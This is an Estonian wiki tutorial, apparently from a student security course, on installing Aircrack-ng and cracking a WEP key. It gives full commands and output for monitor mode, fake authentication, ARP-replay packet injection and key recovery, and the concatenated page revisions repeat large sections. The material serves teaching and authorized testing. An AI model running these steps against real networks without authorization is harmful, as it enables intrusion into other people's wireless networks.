* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:54:54Z

Ktragel: /* Üldkirjeldus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:53:14Z

Ktragel: /* Süntaks */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

